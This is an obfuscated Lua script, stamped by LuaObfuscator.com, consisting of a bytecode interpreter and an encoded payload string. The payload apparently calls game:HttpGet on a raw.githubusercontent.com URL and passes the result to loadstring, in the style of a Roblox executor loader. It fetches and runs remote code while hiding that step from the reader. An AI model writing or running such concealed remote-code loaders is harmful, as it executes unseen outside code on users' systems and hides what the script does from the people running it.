--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=v2(v0(v30,16));if v19 then local v118=0;local v119;while true do if (v118==1) then return v119;end if (0==v118) then v119=v5(v87,v19);v19=nil;v118=1;end end else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + (1701 -(1523 + 114)))))) ;return v88-(v88%(932 -(857 + 74))) ;else local v89=0;local v90;while true do if (v89==(568 -(367 + 201))) then v90=((835 + 94) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or (877 -((401 -119) + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=(1245 -(67 + 113)) -(50 + 18 + 997) ;local v36;local v37;while true do if (v35==(1271 -(226 + 1044))) then return (v37 * (1213 -(892 + 65))) + v36 ;end if (v35==(0 -(0 -0))) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + ((88 + 31) -(32 + 85)) ;v35=351 -((345 -258) + 263) ;end end end local function v23() local v38=952 -(802 + 150) ;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * (30433252 -13656036)) + (v41 * (47703 + 17833)) + (v40 * (1253 -(915 + 82))) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;v38=1 -(1187 -(1069 + 118)) ;end end end local function v24() local v43=v23();local v44=v23();local v45=(1425 -(630 + 793)) -1 ;local v46=(v20(v44,(3 -2) + 0 ,43 -(108 -85) ) * (2^(27 + 5))) + v43 ;local v47=v20(v44,793 -(201 + 571) ,6 + 25 );local v48=((v20(v44,133 -101 )==(1 -0)) and  -(3 -2)) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==(0 -(0 + 0))) then return v48 * (18 -(10 + 8)) ;else v47=3 -2 ;v45=442 -(416 + 26) ;end elseif (v47==(6535 -4488)) then return ((v46==(0 + 0)) and (v48 * (((3 -2) -0)/((2185 -(760 + 987)) -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((3 -1)^(1538 -(998 + 488))))) ;end local function v25(v49) local v50=1913 -(1789 + 124) ;local v51;local v52;while true do if (v50==(3 + (376 -(85 + 291)))) then return v6(v52);end if (v50==(767 -(745 + (1286 -(243 + 1022))))) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=5 -3 ;end if (v50==(0 -0)) then v51=nil;if  not v49 then local v126=701 -(376 + 325) ;while true do if (v126==(0 -(0 -0))) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=1 + 0 ;end if (v50==(1 + 1)) then v52={};for v120=1 + 0 , #v51 do v52[v120]=v2(v1(v3(v51,v120,v120)));end v50=(873 + 185) -(87 + 968) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 + 0 ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91~= #".") then else if (v92== #">") then v93=(function() return v94()~=(572 -(426 + 146)) ;end)();elseif (v92==(1 + 1)) then v93=(function() return v95();end)();elseif (v92~= #"-19") then else v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if (v91~=(241 -(187 + 54))) then else local v128=(function() return 780 -(162 + 618) ;end)();while true do if ((1 + 0)==v128) then v91=(function() return  #",";end)();break;end if (0~=v128) then else v92=(function() return v94();end)();v93=(function() return nil;end)();v128=(function() return 1 + 0 ;end)();end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v54=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 0;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do local v117=(function() return 0;end)();while true do if (v117~=(0 -0)) then else if (v108==1) then local v129=(function() return 0 -0 ;end)();while true do if ((1251 -(721 + 530))~=v129) then else while true do if ((1271 -(945 + 326))==v99) then v100=(function() return v101();end)();if (v102(v100, #".", #".")==(0 + 0)) then local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();local v178=(function() return;end)();local v179=(function() return;end)();while true do if (v176==(1636 -(1373 + 263))) then v177=(function() return v102(v100,1002 -(451 + 549) , #"nil");end)();v178=(function() return v102(v100, #"asd1",2 + 4 );end)();v176=(function() return 1;end)();end if (v176~=(1 -0)) then else local v180=(function() return 0 -0 ;end)();local v181=(function() return;end)();while true do if (v180==(1384 -(746 + 638))) then v181=(function() return 1500 -(1408 + 92) ;end)();while true do if (v181~=(0 + 0)) then else v179=(function() return {v103(),v103(),nil,nil};end)();if (v177==0) then local v186=(function() return 1288 -(993 + 295) ;end)();local v187=(function() return;end)();while true do if (v186~=(0 + 0)) then else v187=(function() return 341 -(218 + 123) ;end)();while true do if (v187~=0) then else v179[ #"91("]=(function() return v103();end)();v179[ #"asd1"]=(function() return v103();end)();break;end end break;end end elseif (v177== #"]") then v179[ #"-19"]=(function() return v104();end)();elseif (v177==2) then v179[ #"xxx"]=(function() return v104() -((1 + 1)^16) ;end)();elseif (v177~= #"xnx") then else local v192=(function() return 0;end)();while true do if (v192~=(1581 -(1535 + 46))) then else v179[ #"-19"]=(function() return v104() -(2^16) ;end)();v179[ #"0836"]=(function() return v103();end)();break;end end end v181=(function() return 1;end)();end if (v181==(1 + 0)) then v176=(function() return 1 + 1 ;end)();break;end end break;end end end if (v176==(562 -(306 + 254))) then if (v102(v178, #"[", #"/")~= #" ") then else v179[531 -(406 + 123) ]=(function() return v105[v179[1771 -(1749 + 20) ]];end)();end if (v102(v178,1 + 1 ,2)~= #"{") then else v179[ #"-19"]=(function() return v105[v179[ #"gha"]];end)();end v176=(function() return 1325 -(1249 + 73) ;end)();end if (v176~=(2 + 1)) then else if (v102(v178, #"xnx", #"nil")== #"<") then v179[ #"http"]=(function() return v105[v179[ #"http"]];end)();end v106[v107]=(function() return v179;end)();break;end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end if (v108==(0 + 0)) then local v130=(function() return 0 -0 ;end)();local v131=(function() return;end)();while true do if (v130==(0 -0)) then v131=(function() return 1467 -(899 + 568) ;end)();while true do if (v131==0) then v99=(function() return 0 + 0 ;end)();v100=(function() return nil;end)();v131=(function() return 1;end)();end if (v131==(1 + 0)) then v108=(function() return 1;end)();break;end end break;end end end break;end end end end;end)();local v55=(function() return function(v109,v110,v111) local v112=(function() return 0 -0 ;end)();local v113=(function() return;end)();while true do if (v112==0) then v113=(function() return 603 -(268 + 335) ;end)();while true do if (v113==0) then v109[v110-#"]" ]=(function() return v111();end)();return v109,v110,v111;end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #".",v60 do FlatIdent_2661B,Type,Cons,v21,v24,v25,v61,v69=(function() return v53(FlatIdent_2661B,Type,Cons,v21,v24,v25,v61,v69);end)();end v59[ #"gha"]=(function() return v21();end)();for v70= #"}",v23() do FlatIdent_7366E,Descriptor,v21,v20,v22,v23,v61,v56,v70=(function() return v54(FlatIdent_7366E,Descriptor,v21,v20,v22,v23,v61,v56,v70);end)();end for v71= #"]",v23() do v57,v71,v28=(function() return v55(v57,v71,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[(41 + 74) -(4 + 110) ];local v67=v63[586 -(57 + 527) ];local v68=v63[1430 -(41 + 1386) ];return function(...) local v72=v66;local v73=v67;local v74=v68;local v75=v27;local v76=104 -(17 + 86) ;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -((2 + 0) -1) ;local v81={};local v82={};for v114=166 -(122 + 44) ,v80 do if ((v114>=v74) or (1335>=3306)) then v78[v114-v74 ]=v79[v114 + (1 -0) ];else v82[v114]=v79[v114 + (3 -2) ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do v84=v72[v76];v85=v84[1 + 0 ];if (v85<=7) then if ((452==452) and (v85<=(1 + 2))) then if ((v85<=((1 + 0) -0)) or (4557<2087)) then if (v85>(65 -(30 + 35))) then v82[v84[2]]=v84[3 + 0 ]~=(1257 -((2451 -1408) + 214)) ;else v82[v84[7 -5 ]]=v84[1215 -(323 + 889) ];end elseif ((3874==3874) and (v85>2)) then v82[v84[5 -3 ]]=v65[v84[583 -((1563 -(373 + 829)) + 219) ]];else v82[v84[2]]=v84[323 -(53 + 267) ]~=(0 + 0) ;end elseif (v85<=(418 -(15 + 398))) then if (v85>4) then local v139=v84[2];v82[v139]=v82[v139](v13(v82,v139 + (983 -(18 + 964)) ,v77));else v82[v84[2]]();end elseif ((v85>6) or (1938>4935)) then local v141=v84[7 -5 ];local v142,v143=v75(v82[v141](v13(v82,v141 + 1 ,v84[3])));v77=(v143 + v141) -(1 + 0) ;local v144=0 + 0 ;for v163=v141,v77 do local v164=850 -(20 + 830) ;while true do if (v164==(0 + 0)) then v144=v144 + (127 -(116 + 10)) ;v82[v163]=v142[v144];break;end end end else do return;end end elseif (((4844>2253) and (v85<=((732 -(476 + 255)) + 10))) or (4255<3423)) then if (v85<=((1877 -(369 + 761)) -(542 + 196))) then if (v85>8) then local v145=v84[3 -1 ];local v146,v147=v75(v82[v145](v13(v82,v145 + 1 ,v84[1 + 2 ])));v77=(v147 + v145) -(1 + 0) ;local v148=0 + 0 + 0 ;for v165=v145,v77 do local v166=0 -(0 -0) ;while true do if ((0 -0)==v166) then v148=v148 + (1552 -(1126 + (805 -380))) ;v82[v165]=v146[v148];break;end end end else v82[v84[407 -((356 -(64 + 174)) + 287) ]]=v84[11 -8 ];end elseif (v85==(1131 -(118 + 1003))) then v82[v84[5 -3 ]]=v65[v84[380 -(142 + 235) ]];else local v153=v84[9 -(1 + 6) ];v82[v153]=v82[v153](v13(v82,v153 + 1 + 0 ,v77));end elseif ((1454<=2491) and (v85<=(990 -(553 + 424)))) then if (v85==((32 -10) -(346 -(144 + 192)))) then do return;end else v82[v84[2 + 0 ]]();end elseif (v85==(14 + (216 -(42 + 174)))) then local v155=0 + 0 + 0 + 0 ;local v156;local v157;while true do if (v155==(0 + 0)) then v156=v84[2 + 0 ];v157=v82[v84[6 -(2 + 1) ]];v155=2 -1 ;end if (v155==(1505 -(363 + 1141))) then v82[v156 + (2 -1) ]=v157;v82[v156]=v157[v84[4]];break;end end else local v158=v84[2];local v159=v82[v84[1 + 2 ]];v82[v158 + (4 -3) ]=v159;v82[v158]=v159[v84[757 -(239 + 514) ]];end v76=v76 + (1581 -(1183 + 397)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403503Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4E6F6D69632D50726F6772612Q6D696E672F6D792D73637269702F726566732F68656164732F6D61696E2F73616A00093Q0012033Q00013Q001203000100023Q00200E000100010003001208000300044Q0002000400014Q0009000100044Q000B5Q00022Q00043Q000100012Q00063Q00017Q00",v9(),...);
